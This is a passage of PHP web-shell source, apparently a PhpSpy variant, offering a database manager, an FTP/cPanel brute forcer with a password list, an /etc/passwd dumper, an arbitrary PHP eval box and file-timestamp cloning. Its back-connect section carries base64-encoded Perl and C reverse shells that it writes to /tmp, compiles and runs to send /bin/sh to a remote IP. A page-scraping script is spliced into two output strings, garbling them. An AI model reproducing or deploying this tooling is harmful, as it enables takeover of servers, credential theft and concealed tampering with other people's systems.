755 makeinput(array('name' => 'dbname', 'size' => 15, 'value' => $dbname));
756 p('DBCharset:');
757 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
758 p('</p>');
759 formfoot();
760 p('<form action="' . $self . '" method="POST" enctype="multipart/form-data" name="mysqlfile" id="mysqlfile">');
761 p('<h2>Upload file</h2>');
762 p('<p><b>This operation the DB user must has FILE privilege</b></p>');
763 p('<p>Save path(fullpath): <input class="input" name="savepath" size="45" type="text" /> Choose a file: <input class="input" name="uploadfile" type="file" /> <a href="javascript:mysqlfile(\'mysqlupload\');">Upload</a></p>');
764 p('<h2>Download file</h2>');
765 p('<p>File: <input class="input" name="mysqldlfile" size="115" type="text" /> <a href="javascript:mysqlfile(\'mysqldown\');">Download</a></p>');
766 makehide('dbhost');
767 makehide('dbport');
768 makehide('dbuser');
769 makehide('dbpass');
770 makehide('dbname');
771 makehide('charset');
772 makehide('doing');
773 makehide('action', 'sqlfile');
774 p('</form>');
775} elseif ($action == 'sqladmin') {
776 !$dbhost && $dbhost = 'localhost';
777 !$dbuser && $dbuser = 'root';
778 !$dbport && $dbport = '3306';
779 $dbform = '<input type="hidden" id="connect" name="connect" value="1" />';
780 if (isset($dbhost)) {
781 $dbform.= "<input type=\"hidden\" id=\"dbhost\" name=\"dbhost\" value=\"$dbhost\" />\n";
782 }
783 if (isset($dbuser)) {
784 $dbform.= "<input type=\"hidden\" id=\"dbuser\" name=\"dbuser\" value=\"$dbuser\" />\n";
785 }
786 if (isset($dbpass)) {
787 $dbform.= "<input type=\"hidden\" id=\"dbpass\" name=\"dbpass\" value=\"$dbpass\" />\n";
788 }
789 if (isset($dbport)) {
790 $dbform.= "<input type=\"hidden\" id=\"dbport\" name=\"dbport\" value=\"$dbport\" />\n";
791 }
792 if (isset($dbname)) {
793 $dbform.= "<input type=\"hidden\" id=\"dbname\" name=\"dbname\" value=\"$dbname\" />\n";
794 }
795 if (isset($charset)) {
796 $dbform.= "<input type=\"hidden\" id=\"charset\" name=\"charset\" value=\"$charset\" />\n";
797 }
798 if ($doing == 'backupmysql' && $saveasfile) {
799 if (!$table) {
800 m('Please choose the table');
801 } else {
802 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
803 $table = array_flip($table);
804 $fp = @fopen($path, 'w');
805 if ($fp) {
806 $result = q('SHOW tables');
807 if (!$result) p('<h2>' . mysql_error() . '</h2>');
808 $mysqldata = '';
809 while ($currow = mysql_fetch_array($result)) {
810 if (isset($table[$currow[0]])) {
811 sqldumptable($currow[0], $fp);
812 }
813 }
814 fclose($fp);
815 $fileurl = str_replace(SA_ROOT, '', $path);
816 m('Database has success backup to <a href="' . $fileurl . '" target="_blank">' . $path . '</a>');
817 mysql_close();
818 } else {
819 m('Backup failed');
820 }
821 }
822 }
823 if ($insert && $insertsql) {
824 $keystr = $valstr = $tmp = '';
825 foreach ($insertsql as $key => $val) {
826 if ($val) {
827 $keystr.= $tmp . $key;
828 $valstr.= $tmp . "'" . addslashes($val) . "'";
829 $tmp = ',';
830 }
831 }
832 if ($keystr && $valstr) {
833 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
834 m(q("INSERT INTO $tablename ($keystr) VALUES ($valstr)") ? 'Insert new record of success' : mysql_error());
835 }
836 }
837 if ($update && $insertsql && $base64) {
838 $valstr = $tmp = '';
839 foreach ($insertsql as $key => $val) {
840 $valstr.= $tmp . $key . "='" . addslashes($val) . "'";
841 $tmp = ',';
842 }
843 if ($valstr) {
844 $where = base64_decode($base64);
845 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
846 m(q("UPDATE $tablename SET $valstr WHERE $where LIMIT 1") ? 'Record updating' : mysql_error());
847 }
848 }
849 if ($doing == 'del' && $base64) {
850 $where = base64_decode($base64);
851 $delete_sql = "DELETE FROM $tablename WHERE $where";
852 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
853 m(q("DELETE FROM $tablename WHERE $where") ? 'Deletion record of success' : mysql_error());
854 }
855 if ($tablename && $doing == 'drop') {
856 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
857 if (q("DROP TABLE $tablename")) {
858 m('Drop table of success');
859 $tablename = '';
860 } else {
861 m(mysql_error());
862 }
863 }
864 $charsets = array('' => 'Default', 'gbk' => 'GBK', 'big5' => 'Big5', 'utf8' => 'UTF-8', 'latin1' => 'Latin1');
865 formhead(array('title' => 'MYSQL Manager'));
866 makehide('action', 'sqladmin');
867 p('<p>');
868 p('DBHost:');
869 makeinput(array('name' => 'dbhost', 'size' => 20, 'value' => $dbhost));
870 p(':');
871 makeinput(array('name' => 'dbport', 'size' => 4, 'value' => $dbport));
872 p('DBUser:');
873 makeinput(array('name' => 'dbuser', 'size' => 15, 'value' => $dbuser));
874 p('DBPass:');
875 makeinput(array('name' => 'dbpass', 'size' => 15, 'value' => $dbpass));
876 p('DBCharset:');
877 makeselect(array('name' => 'charset', 'option' => $charsets, 'selected' => $charset));
878 makeinput(array('name' => 'connect', 'value' => 'Connect', 'type' => 'submit', 'class' => 'bt'));
879 p('</p>');
880 formfoot();
881?>
882<script type="text/javascript">
883function editrecord(action, base64, tablename){
884 if (action == 'del') {
885 if (!confirm('Is or isn\'t deletion record?')) return;
886 }
887 $('recordlist').doing.value=action;
888 $('recordlist').base64.value=base64;
889 $('recordlist').tablename.value=tablename;
890 $('recordlist').submit();
891}
892function moddbname(dbname) {
893 if(!dbname) return;
894 $('setdbname').dbname.value=dbname;
895 $('setdbname').submit();
896}
897function settable(tablename,doing,page) {
898 if(!tablename) return;
899 if (doing) {
900 $('settable').doing.value=doing;
901 }
902 if (page) {
903 $('settable').page.value=page;
904 }
905 $('settable').tablename.value=tablename;
906 $('settable').submit();
907}
908</script>
909<?php
910 // SQL
911 formhead(array('name' => 'recordlist'));
912 makehide('doing');
913 makehide('action', 'sqladmin');
914 makehide('base64');
915 makehide('tablename');
916 p($dbform);
917 formfoot();
918 // Data
919 formhead(array('name' => 'setdbname'));
920 makehide('action', 'sqladmin');
921 p($dbform);
922 if (!$dbname) {
923 makehide('dbname');
924 }
925 formfoot();
926 formhead(array('name' => 'settable'));
927 makehide('action', 'sqladmin');
928 p($dbform);
929 makehide('tablename');
930 makehide('page', $page);
931 makehide('doing');
932 formfoot();
933 $cachetables = array();
934 $pagenum = 30;
935 $page = intval($page);
936 if ($page) {
937 $start_limit = ($page - 1) * $pagenum;
938 } else {
939 $start_limit = 0;
940 $page = 1;
941 }
942 if (isset($dbhost) && isset($dbuser) && isset($dbpass) && isset($connect)) {
943 dbconn($dbhost, $dbuser, $dbpass, $dbname, $charset, $dbport);
944 // get mysql server
945 $mysqlver = mysql_get_server_info();
946 p('<p>MySQL ' . $mysqlver . ' running in ' . $dbhost . ' as ' . $dbuser . '@' . $dbhost . '</p>');
947 $highver = $mysqlver > '4.1' ? 1 : 0;
948 // Show database
949 $query = q("SHOW DATABASES");
950 $dbs = array();
951 $dbs[] = '-- Select a database --';
952 while ($db = mysql_fetch_array($query)) {
953 $dbs[$db['Database']] = $db['Database'];
954 }
955 makeselect(array('title' => 'Please select a database:', 'name' => 'db[]', 'option' => $dbs, 'selected' => $dbname, 'onchange' => 'moddbname(this.options[this.selectedIndex].value)', 'newline' => 1));
956 $tabledb = array();
957 if ($dbname) {
958 p('<p>');
959 p('Current dababase: <a href="javascript:moddbname(\'' . $dbname . '\');">' . $dbname . '</a>');
960 if ($tablename) {
961 p(' | Current Table: <a href="javascript:settable(\'' . $tablename . '\');">' . $tablename . '</a> [ <a href="javascript:settable(\'' . $tablename . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $tablename . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $tablename . '\', \'drop\');">Drop</a> ]');
962 }
963 p('</p>');
964 mysql_select_db($dbname);
965 $getnumsql = '';
966 $runquery = 0;
967 if ($sql_query) {
968 $runquery = 1;
969 }
970 $allowedit = 0;
971 if ($tablename && !$sql_query) {
972 $sql_query = "SELECT * FROM $tablename";
973 $getnumsql = $sql_query;
974 $sql_query = $sql_query . " LIMIT $start_limit, $pagenum";
975 $allowedit = 1;
976 }
977 p('<form action="' . $self . '" method="POST">');
978 p('<p><table width="200" border="0" cellpadding="0" cellspacing="0"><tr><td colspan="2">Run SQL query/queries on database <font color=red><b>' . $dbname . '</font></b>:<BR>Example VBB Password: <font color=red>tmt</font><BR><font color=yellow>UPDATE `user` SET `password` = \'69e53e5ab9536e55d31ff533aefc4fbe\', salt = \'p5T\' WHERE `userid` = \'1\' </font>
979 </td></tr><tr><td><textarea name="sql_query" class="area" style="width:600px;height:50px;overflow:auto;">' . htmlspecialchars($sql_query, ENT_QUOTES) . '</textarea></td><td style="padding:0 5px;"><input class="bt" style="height:50px;" name="submit" type="submit" value="Query" /></td></tr></table></p>');
980 makehide('tablename', $tablename);
981 makehide('action', 'sqladmin');
982 p($dbform);
983 p('</form>');
984 if ($tablename || ($runquery && $sql_query)) {
985 if ($doing == 'structure') {
986 $result = q("SHOW COLUMNS FROM $tablename");
987 $rowdb = array();
988 while ($row = mysql_fetch_array($result)) {
989 $rowdb[] = $row;
990 }
991 p('<table border="0" cellpadding="3" cellspacing="0">');
992 p('<tr class="head">');
993 p('<td>Field</td>');
994 p('<td>Type</td>');
995 p('<td>Null</td>');
996 p('<td>Key</td>');
997 p('<td>Default</td>');
998 p('<td>Extra</td>');
999 p('</tr>');
1000 foreach ($rowdb as $row) {
1001 $thisbg = bg();
1002 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1003 p('<td>' . $row['Field'] . '</td>');
1004 p('<td>' . $row['Type'] . '</td>');
1005 p('<td>' . $row['Null'] . ' </td>');
1006 p('<td>' . $row['Key'] . ' </td>');
1007 p('<td>' . $row['Default'] . ' </td>');
1008 p('<td>' . $row['Extra'] . ' </td>');
1009 p('</tr>');
1010 }
1011 tbfoot();
1012 } elseif ($doing == 'insert' || $doing == 'edit') {
1013 $result = q('SHOW COLUMNS FROM ' . $tablename);
1014 while ($row = mysql_fetch_array($result)) {
1015 $rowdb[] = $row;
1016 }
1017 $rs = array();
1018 if ($doing == 'insert') {
1019 p('<h2>Insert new line in ' . $tablename . ' table »</h2>');
1020 } else {
1021 p('<h2>Update record in ' . $tablename . ' table »</h2>');
1022 $where = base64_decode($base64);
1023 $result = q("SELECT * FROM $tablename WHERE $where LIMIT 1");
1024 $rs = mysql_fetch_array($result);
1025 }
1026 p('<form method="post" action="' . $self . '">');
1027 p($dbform);
1028 makehide('action', 'sqladmin');
1029 makehide('tablename', $tablename);
1030 p('<table border="0" cellpadding="3" cellspacing="0">');
1031 foreach ($rowdb as $row) {
1032 if ($rs[$row['Field']]) {
1033 $value = htmlspecialchars($rs[$row['Field']]);
1034 } else {
1035 $value = '';
1036 }
1037 $thisbg = bg();
1038 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1039 p('<td><b>' . $row['Field'] . '</b><br />' . $row['Type'] . '</td><td><textarea class="area" name="insertsql[' . $row['Field'] . ']" style="width:500px;height:60px;overflow:auto;">' . $value . '</textarea></td></tr>');
1040 }
1041 if ($doing == 'insert') {
1042 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="insert" value="Insert" /></td></tr>');
1043 } else {
1044 p('<tr class="fout"><td colspan="2"><input class="bt" type="submit" name="update" value="Update" /></td></tr>');
1045 makehide('base64', $base64);
1046 }
1047 p('</table></form>');
1048 } else {
1049 $querys = @explode(';', $sql_query);
1050 foreach ($querys as $num => $query) {
1051 if ($query) {
1052 p("<p><b>Query#{$num} : " . htmlspecialchars($query, ENT_QUOTES) . "</b></p>");
1053 switch (qy($query)) {
1054 case 0:
1055 p('<h2>Error : ' . mysql_error() . '</h2>');
1056 break;
1057 case 1:
1058 if (strtolower(substr($query, 0, 13)) == 'select * from') {
1059 $allowedit = 1;
1060 }
1061 if ($getnumsql) {
1062 $tatol = mysql_num_rows(q($getnumsql));
1063 $multipage = multi($tatol, $pagenum, $page, $tablename);
1064 }
1065 if (!$tablename) {
1066 $sql_line = str_replace(array("\r", "\n", "\t"), array(' ', ' ', ' '), trim(htmlspecialchars($query)));
1067 $sql_line = preg_replace("/\/\*[^(\*\/)]*\*\//i", " ", $sql_line);
1068 preg_match_all("/from\s+`{0,1}([\w]+)`{0,1}\s+/i", $sql_line, $matches);
1069 $tablename = $matches[1][0];
1070 }
1071 $result = q($query);
1072 p($multipage);
1073 p('<table border="0" cellpadding="3" cellspacing="0">');
1074 p('<tr class="head">');
1075 if ($allowedit) p('<td>Action</td>');
1076 $fieldnum = @mysql_num_fields($result);
1077 for ($i = 0;$i < $fieldnum;$i++) {
1078 $name = @mysql_field_name($result, $i);
1079 $type = @mysql_field_type($result, $i);
1080 $len = @mysql_field_len($result, $i);
1081 p("<td nowrap>$name<br><span>$type($len)</span></td>");
1082 }
1083 p('</tr>');
1084 while ($mn = @mysql_fetch_assoc($result)) {
1085 $thisbg = bg();
1086 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1087 $where = $tmp = $b1 = '';
1088 foreach ($mn as $key => $inside) {
1089 if ($inside) {
1090 $where.= $tmp . $key . "='" . addslashes($inside) . "'";
1091 $tmp = ' AND ';
1092 }
1093 $b1.= '<td nowrap>' . html_clean($inside) . ' </td>';
1094 }
1095 $where = base64_encode($where);
1096 if ($allowedit) p('<td nowrap><a href="javascript:editrecord(\'edit\', \'' . $where . '\', \'' . $tablename . '\');">Edit</a> | <a href="javascript:editrecord(\'del\', \'' . $where . '\', \'' . $tablename . '\');">Del</a></td>');
1097 p($b1);
1098 p('</tr>');
1099 unset($b1);
1100 }
1101 tbfoot();
1102 p($multipage);
1103 break;
1104 case 2:
1105 $ar = mysql_affected_rows();
1106 p('<h2>affected rows : <b>' . $ar . '</b></h2>');
1107 break;
1108 }
1109 }
1110 }
1111 }
1112 } else {
1113 $query = q("SHOW TABLE STATUS");
1114 $table_num = $table_rows = $data_size = 0;
1115 $tabledb = array();
1116 while ($table = mysql_fetch_array($query)) {
1117 $data_size = $data_size + $table['Data_length'];
1118 $table_rows = $table_rows + $table['Rows'];
1119 $table['Data_length'] = sizecount($table['Data_length']);
1120 $table_num++;
1121 $tabledb[] = $table;
1122 }
1123 $data_size = sizecount($data_size);
1124 unset($table);
1125 p('<table border="0" cellpadding="0" cellspacing="0">');
1126 p('<form action="' . $self . '" method="POST">');
1127 makehide('action', 'sqladmin');
1128 p($dbform);
1129 p('<tr class="head">');
1130 p('<td width="2%" align="center"><input name="chkall" value="on" type="checkbox" onclick="CheckAll(this.form)" /></td>');
1131 p('<td>Name</td>');
1132 p('<td>Rows</td>');
1133 p('<td>Data_length</td>');
1134 p('<td>Create_time</td>');
1135 p('<td>Update_time</td>');
1136 if ($highver) {
1137 p('<td>Engine</td>');
1138 p('<td>Collation</td>');
1139 }
1140 p('</tr>');
1141 foreach ($tabledb as $key => $table) {
1142 $thisbg = bg();
1143 p('<tr class="fout" onmouseover="this.className=\'focus\';" onmouseout="this.className=\'fout\';">');
1144 p('<td align="center" width="2%"><input type="checkbox" name="table[]" value="' . $table['Name'] . '" /></td>');
1145 p('<td><a href="javascript:settable(\'' . $table['Name'] . '\');">' . $table['Name'] . '</a> [ <a href="javascript:settable(\'' . $table['Name'] . '\', \'insert\');">Insert</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'structure\');">Structure</a> | <a href="javascript:settable(\'' . $table['Name'] . '\', \'drop\');">Drop</a> ]</td>');
1146 p('<td>' . $table['Rows'] . '</td>');
1147 p('<td>' . $table['Data_length'] . '</td>');
1148 p('<td>' . $table['Create_time'] . '</td>');
1149 p('<td>' . $table['Update_time'] . '</td>');
1150 if ($highver) {
1151 p('<td>' . $table['Engine'] . '</td>');
1152 p('<td>' . $table['Collation'] . '</td>');
1153 }
1154 p('</tr>');
1155 }
1156 p('<tr class=fout>');
1157 p('<td> </td>');
1158 p('<td>Total tables: ' . $table_num . '</td>');
1159 p('<td>' . $table_rows . '</td>');
1160 p('<td>' . $data_size . '</td>');
1161 p('<td colspan="' . ($highver ? 4 : 2) . '"> </td>');
1162 p('</tr>');
1163 p("<tr class=\"fout\"><td colspan=\"" . ($highver ? 8 : 6) . "\"><input name=\"saveasfile\" value=\"1\" type=\"checkbox\" /> Save as file <input class=\"input\" name=\"path\" value=\"" . SA_ROOT . $_SERVER['HTTP_HOST'] . "_MySQL.sql\" type=\"text\" size=\"60\" /> <input class=\"bt\" type=\"submit\" name=\"downrar\" value=\"Export selection table\" /></td></tr>");
1164 makehide('doing', 'backupmysql');
1165 formfoot();
1166 p("</table>");
1167 fr($query);
1168 }
1169 }
1170 }
1171 tbfoot();
1172 @mysql_close();
1173} //end sql backup
1174elseif ($action == 'backconnect') {
1175 !$yourip && $yourip = $_SERVER['REMOTE_ADDR'];
1176 !$yourport && $yourport = '12345';
1177 $usedb = array('perl' => 'perl', 'c' => 'c');
1178 $back_connect = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw==";
1179 $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ==";
1180 if ($start && $yourip && $yourport && $use) {
1181 if ($use == 'perl') {
1182 cf('/tmp/angel_bc', $back_connect);
1183 $res = execute(which('perl') . " /tmp/angel_bc $yourip $yourport &");
1184 } else {
1185 cf('/tmp/angel_bc.c', $back_connect_c);
1186 $res = execute('gcc -o /tmp/angel_bc /tmp/angel_bc.c');
1187 @unlink('/tmp/angel_bc.c');
1188 $res = execute("/tmp/angel_bc $yourip $yourport &");
1189 }
1190 m("Now script try connect to $yourip port $yourport ...");
1191 }
1192 formhead(array('title' => 'Back Connect'));
1193 makehide('action', 'backconnect');
1194 p('<p>');
1195 p('Your IP:');
1196 makeinput(array('name' => 'yourip', 'size' => 20, 'value' => $yourip));
1197 p('Your Port:');
1198 makeinput(array('name' => 'yourport', 'size' => 15, 'value' => $yourport));
1199 p('Use:');
1200 makeselect(array('name' => 'use', 'option' => $usedb, 'selected' => $use));
1201 makeinput(array('name' => 'start', 'value' => 'Start', 'type' => 'submit', 'class' => 'bt'));
1202 p('</p>');
1203 formfoot();
1204} //end backconnect window via NC
1205// Brute
1206elseif ($action == 'brute') {
1207 formhead(array('title' => 'Brute Forcer'));
1208 makehide('action', 'brute');
1209 makehide('dir', $brute);
1210 @ini_set('memory_limit', 1000000000000);
1211 $connect_timeout = 5;
1212 @set_time_limit(0);
1213 $submit = $_REQUEST['submit'];
1214 $users = $_REQUEST['users'];
1215 $pass = $_REQUEST['passwords'];
1216 $target = $_REQUEST['target'];
1217 $option = $_REQUEST['option'];
1218 $passlist = "0123456
121901234567
1220012345678
12210123456789
122201234567890
1223123456
12241234567
122512345678
1226123456789
12271234567890
1228111111
1229000000
1230222222
1231333333
1232444444
1233555555
1234666666
1235777777
1236888888
1237999999
1238123123
1239456456
1240789789
1241123321
1242456654
1243654321
12447654321
124587654321
1246987654321
12470987654321
1248admin
1249administrator
1250admincp
1251cpanel
1252adminx
1253admins
1254password
1255passwords
1256passw0rd
1257p@ssw0rd
1258p@ssword
1259khongco
126025251325
1261passw0rds";
1262 if ($target == '') {
1263 $target = 'localhost';
1264 }
1265 print " <div align='center'>
1266<form method='post' style='border: 1px solid #000000'><br><br>
1267<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='40%' bgColor=#303030 borderColorLight=#966117 border=1><tr><td>
1268<b> Target : </font><input type='text' name='target' size='16' value= $target style='border: font-family:tahoma; font-weight:bold;'></p></font></b></p>
1269<div align='center'><br>
1270<TABLE style='BORDER-COLLAPSE: collapse' cellSpacing=0 borderColorDark=#966117 cellPadding=5 width='50%' bgColor=#303030 borderColorLight=#966117 border=1>
1271<tr>
1272<td align='center'>
1273<b>Username</b></td>
1274<td>
1275<p align='center'>
1276<b>Password</b></td>
1277</tr>
1278</table>
1279<p align='center'>
1280<textarea rows='20' name='users' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>";
1281 $i = 0;
1282 while ($i < 60000) {
1283 $line = posix_getpwuid($i);
1284 if (!empty($line)) {
1285 while (list($key, $tmt_etcpwd) = each($line)) {
1286 echo "" . $tmt_etcpwd . "\n";
1287 break;
1288 }
1289 }
1290 $i++;
1291 }
1292 echo "
1293</textarea>
1294<textarea rows='20' name='passwords' cols='25' style='border: 2px solid #1D1D1D; background-color: #000000; color:#C0C0C0'>$passlist</textarea><br>
1295<br>
1296<b>Options : </span><input name='option' value='cpanel' style='font-weight: 700;' checked type='radio'> cPanel
1297<input name='option' value='ftp' style='font-weight: 700;' type='radio'> ftp ==> <input type='submit' value='Attack' name='submit' ></p>
1298</td></tr></table></td></tr></form><p align= 'left'>";
1299?>
1300<?php
1301 function ftp_check($host, $user, $pass, $timeout) {
1302 $ch = curl_init();
1303 curl_setopt($ch, CURLOPT_URL, "ftp://$host");
1304 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1305 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1306 curl_setopt($ch, CURLOPT_FTPLISTONLY, 1);
1307 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1308 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1309 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1310 $data = curl_exec($ch);
1311 if (curl_errno($ch) == 28) {
1312 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1313 exit;
1314 } elseif (curl_errno($ch) == 0) {
1315 p("<b>[ spamhacker2015@gmail.com
1316/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b>
1317<b> Attacking has been done! Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font> => <a href=http://$user:$pass@$host:2082 target=_blank>Login</a></b><br>");
1318 }
1319 curl_close($ch);
1320 }
1321 function cpanel_check($host, $user, $pass, $timeout) {
1322 $ch = curl_init();
1323 curl_setopt($ch, CURLOPT_URL, "http://$host:2082");
1324 curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
1325 curl_setopt($ch, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
1326 curl_setopt($ch, CURLOPT_USERPWD, "$user:$pass");
1327 curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);
1328 curl_setopt($ch, CURLOPT_FAILONERROR, 1);
1329 $data = curl_exec($ch);
1330 if (curl_errno($ch) == 28) {
1331 print "<b> Error : Connection timed out , make confidence about validation of target !</b>";
1332 exit;
1333 } elseif (curl_errno($ch) == 0) {
1334 p("<b>[ spamhacker2015@gmail.com
1335/* <![CDATA[ */!function(){try{var t="currentScript"in document?document.currentScript:function(){for(var t=document.getElementsByTagName("script"),e=t.length;e--;)if(t[e].getAttribute("cf-hash"))return t[e]}();if(t&&t.previousSibling){var e,r,n,i,c=t.previousSibling,a=c.getAttribute("data-cfemail");if(a){for(e="",r=parseInt(a.substr(0,2),16),n=2;a.length-n;n+=2)i=parseInt(a.substr(n,2),16)^r,e+=String.fromCharCode(i);e=document.createTextNode(e),c.parentNode.replaceChild(e,c)}}}catch(u){}}();/* ]]> */ ]# </b><b>Attacking has been done!</a> Username: <font color='#FF0000'> $user </font> / Password:<font color='#FF0000'> $pass </font></b><br>");
1336 }
1337 curl_close($ch);
1338 }
1339 if (isset($submit) && !empty($submit)) {
1340 $userlist = explode("\n", $users);
1341 $passlist = explode("\n", $pass);
1342 p('<b>[ attack@the-CoodeX ]# Attacking ...</font></b><br>');
1343 foreach ($userlist as $user) {
1344 $_user = trim($user);
1345 foreach ($passlist as $password) {
1346 $_pass = trim($password);
1347 if ($option == "ftp") {
1348 ftp_check($target, $_user, $_pass, $connect_timeout);
1349 }
1350 if ($option == "cpanel") {
1351 cpanel_check($target, $_user, $_pass, $connect_timeout);
1352 }
1353 }
1354 }
1355 }
1356 formfoot();
1357} elseif ($action == 'etcpwd') {
1358 formhead(array('title' => 'Get /etc/passwd'));
1359 makehide('action', 'etcpwd');
1360 makehide('dir', $nowpath);
1361 $i = 0;
1362 echo "<p><br><textarea class=\"area\" id=\"phpcodexxx\" name=\"phpcodexxx\" cols=\"100\" rows=\"25\">";
1363 while ($i < 60000) {
1364 $line = posix_getpwuid($i);
1365 if (!empty($line)) {
1366 while (list($key, $tmt_etcpwd) = each($line)) {
1367 echo "" . $tmt_etcpwd . "\n";
1368 break;
1369 }
1370 }
1371 $i++;
1372 }
1373 echo "</textarea></p>";
1374 formfoot();
1375} elseif ($action == 'eval') {
1376 $phpcode = trim($phpcode);
1377 if ($phpcode) {
1378 if (!preg_match('#<\?#si', $phpcode)) {
1379 $phpcode = "<?php\n\n{$phpcode}\n\n?>";
1380 }
1381 eval("?" . ">$phpcode<?");
1382 }
1383 formhead(array('title' => 'Eval PHP Code'));
1384 makehide('action', 'eval');
1385 maketext(array('title' => 'PHP Code', 'name' => 'phpcode', 'value' => $phpcode));
1386 p('<p><a href="http://www.4ngel.net/phpspy/plugin/" target="_blank">Get plugins</a></p>');
1387 formfooter();
1388} //end eval
1389elseif ($action == 'editfile') {
1390 if (file_exists($opfile)) {
1391 $fp = @fopen($opfile, 'r');
1392 $contents = @fread($fp, filesize($opfile));
1393 @fclose($fp);
1394 $contents = htmlspecialchars($contents);
1395 }
1396 formhead(array('title' => 'Create / Edit File'));
1397 makehide('action', 'file');
1398 makehide('dir', $nowpath);
1399 makeinput(array('title' => 'Current File (import new file name and new file)', 'name' => 'editfilename', 'value' => $opfile, 'newline' => 1));
1400 maketext(array('title' => 'File Content', 'name' => 'filecontent', 'value' => $contents));
1401 formfooter();
1402} //end editfile
1403elseif ($action == 'newtime') {
1404 $opfilemtime = @filemtime($opfile);
1405 //$time = strtotime("$year-$month-$day $hour:$minute:$second");
1406 $cachemonth = array('January' => 1, 'February' => 2, 'March' => 3, 'April' => 4, 'May' => 5, 'June' => 6, 'July' => 7, 'August' => 8, 'September' => 9, 'October' => 10, 'November' => 11, 'December' => 12);
1407 formhead(array('title' => 'Clone file was last modified time'));
1408 makehide('action', 'file');
1409 makehide('dir', $nowpath);
